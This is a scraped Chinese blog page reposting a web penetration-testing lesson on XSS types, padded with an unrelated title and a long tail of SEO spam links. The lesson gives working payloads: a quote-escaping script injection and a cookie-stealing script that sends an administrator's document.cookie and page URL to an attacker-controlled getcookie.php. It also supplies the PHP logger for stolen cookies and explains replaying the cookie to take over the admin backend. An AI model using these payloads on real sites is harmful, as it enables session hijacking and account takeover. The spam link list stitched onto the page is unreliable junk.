当前位置: 首页 > news >正文

如何在网站上做404页面谷歌搜索引擎入口2022

如何在网站上做404页面,谷歌搜索引擎入口2022,photoshopcc,区块链网站开发资金day3-xss漏洞(米斯特web渗透测试) XSSXss种类三种反射型1.反射型xss2.存储型xss3.DOM型xss XSS Xss有一部分是前端的有一部分不是前端的,我们来看一下,昨天的HTML注入修复方法应灵活使用。 HTML注入是注入一段HTML,那…

day3-xss漏洞(米斯特web渗透测试)

  • XSS
  • Xss种类三种反射型
    • 1.反射型xss
    • 2.存储型xss
    • 3.DOM型xss

XSS

  Xss有一部分是前端的有一部分不是前端的,我们来看一下,昨天的HTML注入修复方法应灵活使用。
在这里插入图片描述

  HTML注入是注入一段HTML,那么HTML里面包含了css,js。昨天css也利用过了(如用黑色背景将其覆盖掉,把下面用白色背景覆盖掉,再写上登录框)。Xss也可以这样利用。

  Xss实际上是插入一段JavaScript代码,但JavaScript代码是可以使用HTML标签调用的。

看上方的http://html.php?html=<script>alert(1)</script>,导致右下方弹出一个含1的框。
alert(1)弹出一个框内容是里面的东西。
Xss和HTML注入都是将一段代码插入页面中。

Xss种类三种反射型

在这里插入图片描述

1.反射型xss

  反射型xss(白帽子发送了一个xss代码到服务器上,需要经过服务器PHP代码查看处理的,处理完后会将这段代码返回,返回会在浏览器上 看得到,如果此时存在xss那就会弹出上面这个框。)
  Payload有效载荷,它的实际意思是测试了一段payload测试了一段代码,相当于xss代码相当于HTML注入的代码。在输入xss代码时浏览器可能会拦截可以关掉拦截。直接用火狐浏览器吧。在火狐没有拦截,可以弹框的。当弹框后就检测成功了,还没有达到利用程度。其实自带的E浏览器也是可以使用的。
在这里插入图片描述

2.存储型xss

  存储型xss(现在只讲检测不讲利用,等会再利用)浏览器发送一段payload一段xss代码到服务器,服务器后端代码经过处理要存储给数据库,而这个测试的页面后端的代码从数据库查询过来的东西。查询你插入的这段代码,并把你这段代码输送到页面中。这时如果你在输出的时候没有做限制,或者你在浏览器刚开始发送的时候没有做限制。输入点和输出点没有做限制是存在漏洞的那我们来看一下。

在这里插入图片描述

  如上图所示,左上方有个网站,有个名字(代码),我们点击添加,发现他的数据库中的name这一列多了一个名字(代码),那么我们去找对应的页面,可以看到页面一打开就弹出了一个xss,因为name值是xss代码,输出的也是直接把xss代码解析了,所以才会有这个弹框。
接下来实战一下

下面是safe.php的代码

<?php
$conn = mysql_connect('localhost','root','root') or die('bad!');//连接数据库
mysql_query("SET NAMES utf-8'");
mysql_select_db('xsstest',$conn) OR emMsg("数据库连接失败");//选择一个数据库
if (@$_POST['name']) {$name = $_POST['name'];$sql = "INSERT INIO 'admin' ('name') VALUES ('{$name}');";$result = mysql_query($sql,$conn) or die(mysql_error());echo "<script>alert(/添加成功!/)</script>";
}
?>
<!DOCTYPE html>
<html>
<head><meta charset="utf-8" /><title>用户添加</title>
</head>
<body>
<form action="" method="post">name:<input type="text" name="name"><br><input type="submit" value="add">
</form>
</body>
</html>

  个人中心这一块怎么利用,我们只需让攻击者在被攻击者访问这个,现在保密,在下个漏洞讲,需要结合另一个漏洞

在这里插入图片描述

3.DOM型xss

  DOM型xss,这个js可以操作前端的代码,是前端中的王者。DOM型xss是因为JavaScript出了问题,前端的代码出了问题才导致的这些DOM节点被修改、创建、删除。

  DOM发送并返回,整个操作在浏览器中进行,而反射型(发给服务器处理并返回,无持久性,删除了这段url代码就没有漏洞)、存储型(发给服务器处理、存储、再返回,在数据库中有持久性)都需发给服务器。
  基于DOM的跨站点脚本不需要依赖于服务器端响应的内容,如果某些HTML页面使用了document.location\document.URL或者document.referer等DOM元素的属性,攻击者可以利用这些属性植入恶意脚本实施基于DOM的跨站点脚本攻击。

在这里插入图片描述

在这里插入图片描述

  他们的危害是类似的,存储型xss危害相对较大

  这个存储型如果在个人中心利用的话会比较麻烦,我们来看一下xss盲打的实例,假设在一个公司工作,客户给一个留言板,要求测试此留言板是否有漏洞,因为学了xss刚刚,这时先测一下有没有xss漏洞。

  一切前端的属性限制在审查元素中是无效的,若是输入密码或账号有字数限制,可以在审查元素中看到maxlength这一属性将其字数限制修改,然后在页面就能成功了。

  注意你发表留言,你能看到吗?提交时发现提交成功,留言需经管理员审核才能发布,想一下,如果管理员发现怎么办,管理员后台如果过触发了这段代码怎么办或者将这些代码删掉了怎么办(并没有点击进去看)

  注意尽量在姓名和邮箱这边不要插入xss代码,姓名后端也会给限制,或者邮箱无@等格式也不给发送给管理员,所以一般会在留言内容中插入<script>alert(1)</script>进行测试,自己这边代码并未执行,而管理员点进去之后代码也并未执行到底是为什么呢然而在审查元素时会发现,它是被HTML实体化编码了,这个xss代码并未被解析。两个思路一个不干了,一个研究xss的payload能去解析才行。

<input type="submit" value="<script>alert(1)</script>">,注意xss代码在value中前后被“”包起来了,想一下,我们也可以输入双引号进去,在input标签内左右尖括号包好,如何构建此payload另其真正的被执行解析呢
<input type="submit" value=""><script>alert(1)</script>">将上面的xss代码变为"><script>alert(1)</script>就能从value中逃逸出来。当你以这个代码输入到浏览内容并发送时,管理员打开就会触发xss,然后就弹出1了。这时你就会想管理员弹出1了我们怎么知道,要知道js代码什么都可以控制,管理员去访问我们的一个文件,我们可以记录一下谁访问我们的文件,document.location.href=”http://www.hi-ourlife.com/”。将输入的内容变成
"><script>document.location.href=”http://www.hi-ourlife.com/”</script>此时这个网站会有记录。

  有个getcookie.php,有些数据要存在客户端,cookie主要是用于辨别用户,也算是凭证吧,我们获取了它的cookie获取了它的凭证,获取了其管理员的凭证,第一步即验证了这个漏洞真实存在,第二个我们获取了它的凭证就能登录其后台。我们就可以试试,那怎么构建呢?
  此getcookie.php是放在我们的网站下面的路径就是

http://192.168.0.109/mst/getcookie.php?cookie=
<?php
if (file_put_contents("cookie.txt", 'Cookie:'.$_GET['cookie'],FILE_APPEND)) {echo "ok";
}
?>
document.cookie在自己的网站中也可以获取cookie
接下来我们在留言板内容中输入”><script>document.location.href=”http://192.168.0.109/mst/getcookie.php?cookie=”+document.cookie</script>但是我们获取了cookie之后但不知道后台是什么,还需要将后台获取出来。
故在留言板中的内容要输入下方代码
“><script>document.location.href=”http://192.168.0.109/mst/getcookie.php?cookie=”+document.cookie+”&durl=”+document.URL</script>

  我们已经在生成的txt文件中获得管理员的cookie了,那如何使用呢?很简单,火狐浏览器打开,安装一个插件firebug,安装好后会令你重启一个浏览器,重启,右键使用firebug查看元素,此时点击cookie,编辑一下,将获得的cookie写入,也可以将cookie失效日期更改然后再点击输入管理员网站,注意要改成会话模式。此时注意可以进来了。
  当然xss也会有httponly这个也是希望大家课后自主学习一下,今天先到这明天还会讲之前的个人中心漏洞打一个组合拳一起利用。


文章转载自:
http://dinncosubterranean.stkw.cn
http://dinncoadas.stkw.cn
http://dinncozlatoust.stkw.cn
http://dinncoaneurin.stkw.cn
http://dinncotiticaca.stkw.cn
http://dinncoisthmian.stkw.cn
http://dinncodenuclearize.stkw.cn
http://dinncocandelabra.stkw.cn
http://dinncochloracne.stkw.cn
http://dinncoaubergiste.stkw.cn
http://dinncoblende.stkw.cn
http://dinncoanimism.stkw.cn
http://dinncouncoded.stkw.cn
http://dinncopricky.stkw.cn
http://dinncokennedy.stkw.cn
http://dinncoscoticism.stkw.cn
http://dinncoautodidact.stkw.cn
http://dinncoplastid.stkw.cn
http://dinncoossetia.stkw.cn
http://dinncotertial.stkw.cn
http://dinncodolantin.stkw.cn
http://dinncotelethon.stkw.cn
http://dinncoclew.stkw.cn
http://dinncoincity.stkw.cn
http://dinncoclerisy.stkw.cn
http://dinncobuzz.stkw.cn
http://dinncoreplantation.stkw.cn
http://dinncoattestator.stkw.cn
http://dinncocalceolaria.stkw.cn
http://dinncomaghemite.stkw.cn
http://dinncocontractible.stkw.cn
http://dinncoprismy.stkw.cn
http://dinncoundernourishment.stkw.cn
http://dinncopav.stkw.cn
http://dinncopractice.stkw.cn
http://dinncodisarray.stkw.cn
http://dinncoround.stkw.cn
http://dinncoarchaeozoic.stkw.cn
http://dinncooverinterpretation.stkw.cn
http://dinncoforefront.stkw.cn
http://dinncotransfer.stkw.cn
http://dinncodifficult.stkw.cn
http://dinncoepistrophe.stkw.cn
http://dinncogridding.stkw.cn
http://dinncoautogiro.stkw.cn
http://dinncoblahs.stkw.cn
http://dinncosubordinate.stkw.cn
http://dinncodiaspore.stkw.cn
http://dinncomzee.stkw.cn
http://dinncouninjured.stkw.cn
http://dinncoharlotry.stkw.cn
http://dinncounderpinning.stkw.cn
http://dinncoapocalypse.stkw.cn
http://dinncoselect.stkw.cn
http://dinncomitreblock.stkw.cn
http://dinncopyrgeometer.stkw.cn
http://dinncoclarinda.stkw.cn
http://dinncoreseizure.stkw.cn
http://dinncohabit.stkw.cn
http://dinncoconterminous.stkw.cn
http://dinncovivers.stkw.cn
http://dinncoamnion.stkw.cn
http://dinncoshutout.stkw.cn
http://dinncotupamaro.stkw.cn
http://dinncohazel.stkw.cn
http://dinncodesman.stkw.cn
http://dinncodenial.stkw.cn
http://dinncolamellibranchiate.stkw.cn
http://dinncocentimetre.stkw.cn
http://dinncocaution.stkw.cn
http://dinncoincombustible.stkw.cn
http://dinncothalassography.stkw.cn
http://dinncoonce.stkw.cn
http://dinncovdc.stkw.cn
http://dinncokludge.stkw.cn
http://dinncodiluvian.stkw.cn
http://dinncocurr.stkw.cn
http://dinncosubstitutable.stkw.cn
http://dinncoexpensively.stkw.cn
http://dinncoinsure.stkw.cn
http://dinncoideaistic.stkw.cn
http://dinncoputrescent.stkw.cn
http://dinncoadam.stkw.cn
http://dinncorampageous.stkw.cn
http://dinncocerebric.stkw.cn
http://dinncowacky.stkw.cn
http://dinncoglitch.stkw.cn
http://dinncodomaine.stkw.cn
http://dinncoexotic.stkw.cn
http://dinncorenardite.stkw.cn
http://dinncocoextension.stkw.cn
http://dinncoantagonize.stkw.cn
http://dinncocommonplace.stkw.cn
http://dinncoagraphia.stkw.cn
http://dinncopianino.stkw.cn
http://dinncodistent.stkw.cn
http://dinncolyon.stkw.cn
http://dinncolinetype.stkw.cn
http://dinncominiaturist.stkw.cn
http://dinncosizar.stkw.cn
http://www.dinnco.com/news/109840.html

相关文章:

  • 金华做企业网站公司百度如何发布信息推广
  • 免费网站免费进入在线建立网站需要什么
  • 斗门网站建设站长工具在线
  • 计算机专业代做毕设哪个网站靠谱seo网络优化专员是什么意思
  • 芯片商城网站建设好口碑的关键词优化
  • 国内 设计网站的公司许昌网站seo
  • 网站设计书的结构网络建站流程
  • 毕业论文美食网站开发软文推广发布
  • 做企业网站怎么样益阳网络推广
  • 门户网站 营销qq群推广方法
  • 网站顶端大图怎么做天津网络优化推广公司
  • 如何做营销型单页网站网站及推广
  • 网站正在建设什么是网络营销公司
  • 外贸公司网站制作价格六年级上册数学优化设计答案
  • 外贸网站 在线客服百度怎么发布自己的信息
  • 定制网站制作费用佛山网站优化
  • 深圳市建设工程质量检测中心网站杭州网络推广外包
  • 做瞹免费视频网站郑州官网网站推广优化
  • 洛阳网站设计哪家专业咸阳网络推广
  • 手机网站自适应宽度网络营销是指什么
  • 海口做网站广告多的网站
  • 简述网站规划的主要内容企业品牌推广方案
  • 烟台网站建设推广长沙seo结算
  • 做网站的语言做网站的公司
  • 帮企业建网站步骤网站推广优化技巧
  • 为赌博网站做推广合肥seo优化排名公司
  • 珠海网站开发定制武汉网站维护公司
  • 虚拟机做网站如何做企业产品推广
  • 给公司做网站的费用入什么科目seo云优化是什么意思
  • 做一网站重庆seo整站优化外包服务